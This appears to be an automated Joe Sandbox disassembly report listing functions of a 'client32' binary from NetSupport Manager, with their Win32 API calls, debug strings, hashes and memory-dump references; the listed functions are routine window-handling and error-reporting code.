Instruction ID: f09b96a616f6a33d867b0b5af4e6941d1959c252ec7f828cb2a239631c18db6c
Opcode Fuzzy Hash: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
Instruction Fuzzy Hash: 1701A2B1D10219AFCB90CFA9C8457DEBBF4AB0C310F10816AE519F6240E67556808F94

Uniqueness

Uniqueness Score: -1.00%

Function 110D15C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\CTL32\NSMString.cpp, xrefs: 110D15FE
pszBuffer[1024]==0, xrefs: 110D1603

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
API String ID: 175691280-2052047905
Opcode ID: 80bf54f75d60de959a569c8df654b715eddbd256bd047d3a81eed0e5ac7c8735
Instruction ID: d047ce25565584385d90dc1a88bf85935da342945f7d0a1e0c7239cac7a22c38
Opcode Fuzzy Hash: 80bf54f75d60de959a569c8df654b715eddbd256bd047d3a81eed0e5ac7c8735
Instruction Fuzzy Hash: 1AF0A475A0025CBBCB00DED4DC40BEEFBA8AB45208F004099F549A7140DE706A55C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 11014390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

ImageList_Create.COMCTL32(?,?,?,?,?), ref: 110143BE

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hImageList, xrefs: 110143D1
..\ctl32\imagelst.cpp, xrefs: 110143CC

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateErrorExitImageLastList_MessageProcesswsprintf
String ID: ..\ctl32\imagelst.cpp$m_hImageList
API String ID: 756090014-1731862680
Opcode ID: 07d921ffa2181537d20c18b6818c9ba3a9d0b657febdfe7dc916a1ba0a5e0468
Instruction ID: ed28c1bf2740c29e09f0e670a8a7b9fc6316d817cb7ee806623638b648209f33
Opcode Fuzzy Hash: 07d921ffa2181537d20c18b6818c9ba3a9d0b657febdfe7dc916a1ba0a5e0468
Instruction Fuzzy Hash: 50F062B1600719AFC320CF59D805A97B7E8EF98310B00852DF99AC3600D370E8508FA0

Uniqueness

Uniqueness Score: -1.00%

Function 1115F340 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

SetPropA.USER32 ref: 1115F395

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

p->m_hWnd, xrefs: 1115F372
..\ctl32\wndclass.cpp, xrefs: 1115F350, 1115F36D

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcessPropwsprintf
String ID: ..\ctl32\wndclass.cpp$p->m_hWnd
API String ID: 1134434899-3115850912
Opcode ID: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
Instruction ID: 87c86bef28f98f72f88127ca4e69caffea3bfce03f9a6da2004c13aaf4101256
Opcode Fuzzy Hash: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
Instruction Fuzzy Hash: FCF0E575BC0336B7D7509A66DC82FE6F358D722BA4F448016FC26A2141F274E980C2D2

Uniqueness

Uniqueness Score: -1.00%

Function 110151E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,0000102D,00000000,?), ref: 11015229

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 110151F9
e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151F4

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
API String ID: 819365019-3966830984
Opcode ID: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
Instruction ID: 9699e87d833f238af44183ea9879e136ee952ee53a84507d201ef9d6a93955d8
Opcode Fuzzy Hash: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
Instruction Fuzzy Hash: 19F0FEB5D0025DABCB14DF95DC85EDAB7F8EB4D310F00852AFD29A7240E770A950CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 110173D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 110173E4
SetLastError.KERNEL32(00000078), ref: 11017409

Strings

QueueUserWorkItem, xrefs: 110173DE

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: QueueUserWorkItem
API String ID: 199729137-2469634949
Opcode ID: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
Instruction ID: 14daf5f2905bb7c6da6366d36066c9679ffc6904d36036c61edd8dc8337596d2
Opcode Fuzzy Hash: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
Instruction Fuzzy Hash: 06F01C72A50628AFD714DFA4D948E9BB7E8FB54721F00852AFD5597A04C774F840CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 11014750 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,0000102E,00000000,?), ref: 11014793

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11014769
e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11014764

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
API String ID: 819365019-3966830984
Opcode ID: edb666d734a3c39fef51d819953857bdb887e57867b1cab73224bd04a5144ee4
Instruction ID: c9fb50cd67a7904ce2a0fbbe4fb239e4265337958f9b9b5755b2e20bf6b4d1ba
Opcode Fuzzy Hash: edb666d734a3c39fef51d819953857bdb887e57867b1cab73224bd04a5144ee4
Instruction Fuzzy Hash: C8F0A075E0021DABCB14DF99CC85EDAF3E8EB0C310F00812AF819A7240E7B0A540CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 11014640 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00001003,?,00000000), ref: 1101467E

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11014656
e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11014651

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
API String ID: 819365019-3966830984
Opcode ID: f583b1c5b20a86c22d2a28e61b92caf84120fa939f6efd175a3542e28d6d9ca0
Instruction ID: 66a3a55dc25f510b93f26b1a7f42dd2d5db843367b8ff42493b3ff2dd96a5ec2
Opcode Fuzzy Hash: f583b1c5b20a86c22d2a28e61b92caf84120fa939f6efd175a3542e28d6d9ca0
Instruction Fuzzy Hash: AAE09275B00219AFD350DA95DC81F96B3DCAB09719F014425F519DA154EBB0E94087A1

Uniqueness

Uniqueness Score: -1.00%

Function 1101D320 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,FlashWindowEx), ref: 1101D334
SetLastError.KERNEL32(00000078), ref: 1101D351

Strings

FlashWindowEx, xrefs: 1101D32E

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: FlashWindowEx
API String ID: 199729137-2859592226
Opcode ID: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
Instruction ID: 7fa6031e8bb94c9d2945b427b42de2899da1a72ad2875e3a9dcb47a7bac4ba5f
Opcode Fuzzy Hash: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
Instruction Fuzzy Hash: 83E01272A412389FD324EBE9A848B4AF7E89B54765F01442AEA5597904C675E8408B90

Uniqueness

Uniqueness Score: -1.00%

Function 11002130 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 1100213A

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\floatbar.h, xrefs: 11002150
m_pToolbar, xrefs: 11002155

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcessWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\floatbar.h$m_pToolbar
API String ID: 2577986331-281161189
Opcode ID: 35783d953fd85d00738a6eb2ba99d550ce6056d1f12e3eeb32741e389c5bd5cf
Instruction ID: 060336b2bd4469f278674b99be49374638fb6687acdde2fc2171db53485ff0b1
Opcode Fuzzy Hash: 35783d953fd85d00738a6eb2ba99d550ce6056d1f12e3eeb32741e389c5bd5cf
Instruction Fuzzy Hash: C6E09239F00511ABE715CA65E844F8AF3E9BF98744F000165E515D3621C730EC01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 11001090 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010C7

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 110010A6
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010A1

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitItemLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2046328329-2830328467
Opcode ID: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
Instruction ID: 55addf44b20248d1cdc7b1377ce96882c1c4f69405d532d8ba5fa0b62c56eca9
Opcode Fuzzy Hash: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
Instruction Fuzzy Hash: 8DE01AB661021DBFD714DE85EC81EEBB3ECEB49354F008529FA2A97240D6B0E850C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 11001050 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,?,?,?), ref: 11001083

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11001066
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001061

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 819365019-2830328467
Opcode ID: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
Instruction ID: 50f06fe94c134d50a88b9402c61dae4da10641179b5ac6344e644b67b4693846
Opcode Fuzzy Hash: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
Instruction Fuzzy Hash: 6AE04FB5A00219BBD710DE95DC45EDBB3DCEB48354F00842AF92597240D6B0F84087A0

Uniqueness

Uniqueness Score: -1.00%

Function 110010E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

PostMessageA.USER32(?,?,?,?), ref: 11001113

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 110010F6
